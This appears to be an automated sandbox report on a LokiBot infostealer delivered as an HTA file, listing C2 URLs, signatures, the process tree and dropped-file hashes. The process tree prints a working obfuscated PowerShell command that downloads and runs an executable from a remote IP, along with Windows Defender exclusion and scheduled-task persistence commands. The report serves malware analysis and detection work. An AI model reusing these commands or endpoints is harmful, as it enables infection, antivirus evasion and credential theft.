Analysis

  • max time kernel
    142s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    18-11-2024 17:41

General

  • Target

    givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta

  • Size

    178KB

  • MD5

    e80a6dc30c45134e8c433ef07277022f

  • SHA1

    9041ab7b0cf03e4c18f86ff32eac95c3ad06f462

  • SHA256

    11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182

  • SHA512

    6156f6fcb24fedaabb7d1d62a0ff71e7bd8c6ab194c1a5c1b7ccc25644ba36dd62a79a8989dba98015044502a64db5c32187b802cc42dc964f25323c352519d8

  • SSDEEP

    96:4vCl17nlkfktbLVe4I9qWs5cew1WyNk6O5Q:4vCldn+s9he4CqWj26O5Q

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.95/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2488
    • C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe
      "C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'JFo3VE02ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRFZmluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJwdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGaUVJdnlPaGJJcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPZ2NBUnYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo3VE02OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjEzNi8zNy9jYXNwb2wuZXhlIiwiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUiLDAsMCk7c1RBUlQtc0xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjYXNwb2wuZXhlIg=='+[CHAr]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2472
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ovqz5dnr.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2960
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES983B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC983A.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2900
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2040
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1696
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp713A.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2764
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          PID:1300
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:852

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES983B.tmp

    Filesize

    1KB

    MD5

    80a19fdb1a97e34ef780048edf1b1f50

    SHA1

    cbd52d2cb1735a78b85dad246b0469e0ca1d163e

    SHA256

    f3bd427f508fdf3fd3299cda2f0cdc225656fa0b6883698d048d6b12830cf1fb

    SHA512

    051b0eafc720c7bce4e33ebac7fb8b7c8228fc1e6310fb42d5cf757e15413c88dad22b34a1aa09ec145cff06ab69477b6d403e4a21a5a33bac85e623592a4325

  • C:\Users\Admin\AppData\Local\Temp\ovqz5dnr.dll

    Filesize

    3KB

    MD5

    73a9dd72565697cc58b504988e79bc59

    SHA1

    6eceda6eb5638e95988774c4ccea5fa3dcace31e

    SHA256

    40727a0e83e8ed960044775ea2ceba67adbf0d698f957d1ea67efac5d7993b72

    SHA512

    2a481b37bf68630ee4bffb32477af926ff85389ef8b72dc6f10d17ec63834f8fe95629ee0b6b841110202356030cd1fcec20af89b65fda257d53213612b62e9d

  • C:\Users\Admin\AppData\Local\Temp\ovqz5dnr.pdb

    Filesize

    7KB

    MD5

    ceb776dcb78e259b7e76bfb7cb34b7c6

    SHA1

    31be46c155cf0963edad8a1276ed4e0c6803dbfe

    SHA256

    1810dac92a0151c729b98540e05bac893c3dac4917735a5551101456a506a0ad

    SHA512

    2817c725ed27d2cdc73f9b9e8046da088c65b338d2562089e035f7bd3ecc33ed612e424f7835bc68e0042290ef16516c3bc670005a69f2e926e30d840406f398

  • C:\Users\Admin\AppData\Local\Temp\tmp713A.tmp

    Filesize

    1KB

    MD5

    06936a3c1db83f5c87bca803fc45306b

    SHA1

    5bf371b8f1c9204bbf48f3a31d664bafd16b9fbd

    SHA256

    68a60050215e39d48e3032d5826bb5282009308721c71a9556a8056377ecae8e

    SHA512

    9281d5c736c1f34debd8713e71ec2435cd8edaff281c6bbf9afdec29e359804487e247ba9ae3acd9442e4ecc51a6537900b390fc753dd521bac0f785fc46ffd9

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2039016743-699959520-214465309-1000\0f5007522459c86e95ffcc62f32308f1_d58f30ce-7498-4544-8c46-d67b11e386bc

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2039016743-699959520-214465309-1000\0f5007522459c86e95ffcc62f32308f1_d58f30ce-7498-4544-8c46-d67b11e386bc

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    13f9045d9046a9691b3a3dc9d16d43d6

    SHA1

    2de1333b8dd2e1aa2d2da49b29b05ccec8450006

    SHA256

    9f685207de1e714a2eeceda538f748f62f21d88d22e63aff9b5b7575f4528164

    SHA512

    10674638dee3538281a878e98ea3ccf416f0f2c4d5d8811563e9283888893af29a318784d706226b748d708f8279f3444d8a2f40bd4b01e8c62fc4635524189f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    06e698025b19aa9c828a470abb33ba9d

    SHA1

    cf1ea09dd2013866080cfc3093d0ce491b72c594

    SHA256

    34a18bd29fdf09c160e59b6f9ecd0dbfb641c19c83d7b7827d9d6958510f3a02

    SHA512

    b0b537eba56e8bc0ae25254a4893d0cd86bf1b88d949d78867c4eb838192eb065e1d3300429c672aa4cdfe5f9d6cc190f66f400b6db1339adae84ae5abc13c11

  • C:\Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    568KB

    MD5

    318ff90d7a2797a041b836f7f8900f62

    SHA1

    fdda6afed7a1643ae353e7a635e6744c2b0a07d5

    SHA256

    241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430

    SHA512

    808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC983A.tmp

    Filesize

    652B

    MD5

    5e6e36470e9193bed4dc67741ba7095a

    SHA1

    d6bfa8423dd3b65b56aad9abcde4dea6e391753f

    SHA256

    c97520d594ea8343447332e1c5a2b4d4408022e4604e744b8ca9479d364bd755

    SHA512

    d965eff9ceafc3099ad914aa0694bbafbd139806da555b330abf1b4978acb301d5f6802c47bdec8f79268f8d1cbbe6c9a838e99440fd93f1112d3485aff43b4b

  • \??\c:\Users\Admin\AppData\Local\Temp\ovqz5dnr.0.cs

    Filesize

    464B

    MD5

    f8419bbc398e1a2b134eec88b333f8f6

    SHA1

    57ebba4cad00272da80b919df0908ec40f9be48a

    SHA256

    25fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3

    SHA512

    b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674

  • \??\c:\Users\Admin\AppData\Local\Temp\ovqz5dnr.cmdline

    Filesize

    309B

    MD5

    101bbe016984eb02091f7297804ac900

    SHA1

    900c474d18104d3828724b3d1b9daa7e6e47c41a

    SHA256

    08e7f70e4a8bdcea0f5e1da8fa9d4e328326987412cadd12c4f6fb3837bcfb86

    SHA512

    d8853fb1c9b115adcad9fd58828f843c188b74a0dca5cc4d67772c6dd37cf90f452f59b168de8e30fb862a762c2d947176a537234efebc03e3983a6113217411

  • memory/852-65-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/852-68-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/852-66-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/852-63-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/852-61-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/852-59-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/852-57-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/852-55-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2620-35-0x0000000000F30000-0x0000000000FC4000-memory.dmp

    Filesize

    592KB

  • memory/2620-37-0x0000000004E10000-0x0000000004E74000-memory.dmp

    Filesize

    400KB

  • memory/2620-36-0x0000000000370000-0x0000000000382000-memory.dmp

    Filesize

    72KB